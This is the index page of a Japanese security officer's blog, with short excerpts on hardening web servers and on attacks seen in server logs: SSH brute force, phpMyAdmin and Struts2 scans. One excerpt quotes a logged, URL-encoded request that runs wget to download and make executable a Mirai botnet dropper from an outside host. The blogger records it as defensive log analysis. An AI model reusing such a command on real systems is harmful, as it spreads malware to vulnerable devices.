fragiler’s Security blog

会社でセキュリティ担当しています。まだまだ勉強中の身ですが、遊びがてら発見したセキュリティ関連のことがらを呟こうと思います。

Webアンケートサイトを立ち上げる時に確認すべきポイント

「Webアンケートサイトを立ち上げる時に気にしたほうがよいポイントって何だろう」というポイントまとめてみました。 企業ではいろいろな部門が情報発信や情報収集のためWebサイトを立ち上げると思います。 手っ取り早くユーザの声を集めたいときなどは、ア…

Webサイトの構築(これくらいはやってて欲しいOS設定編)

どこの企業も一般の方々向けのWebサイトを立ち上げるのは当たり前の時代です。 Webサイト立ち上げのツールや、安い料金でサイトを立ち上げてくれるサイト構築ベンダなど、いまや簡単にサイトの構築ができます。 でもセキュリティ担当やっていると一抹の不安…

sshに対する不正アクセス

前回から少し間が開いてしまいましたが、その間sshに対する大量のログイン試行がありました。 41時間かけて10分間隔でダラダラとログインを試していたようです。 以下がログイン試行に使われたアカウント達です。 admin的なものもあればOS名もあればCMS名も…

phpMyAdminのスキャン

初めてこのログを見たときは少しびっくりしました。 40秒ほどのあいだに以下のログが記録されてて「ヤバい!なんかされてる!」と焦ってしまいましたが、ネットで調べてみるとたくさん報告されてますね。 ーーーーーーーーーーーーーーーーーーーーーーーー…

Mirai-BotnetのDropperを落とそうとするアクセス

Struts2攻撃と思われるものに交じって、こんなのが来てました。 「GET /shell?%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%68%74%74%70%3A%2F%2F%XX%XX%2E%XX%XX%XX%2E%XX%XX%XX%2E%XX%XX%3A%35%34%33%32%31%2F%64%6C%72%2E%61%72%6D%3B%63%68%6D%6F%64%20%37%…

本日のstruts2探索状況

本日朝も以下のような探索ログが残っていました。 始めから終わりまで10秒間かけて順番に該当するものがあるか試してるみたいです。 Strutsってデフォルトこういうディレクトリ構成なの???(私は知見がないためわからないです) ちなみに発信元はドイツで…

Apache Struts2で脆弱性(S2-045)のあるWebサイトの探索?

3/23以降、今話題のApache Struts2の脆弱性(S2-045)を狙っているのかもしれないアクセスが急に来ていました。 Struts2を利用していると「.aciton」がURLに付くというのをWeb上で見ましたので、上記は今回の脆弱性を狙う攻撃につながるアクセスなのかなぁと…

はじめに・・・

某企業のセキュリティ担当者です。 日々社内や関連会社から相談受けたり、会社のルール作ったり、ウィルス感染が見つかれば端末没収(?)する仕事をしております。 とは言っても、まだまだ分からないことがたくさんあり、仕事に追われながら少しでも理解し…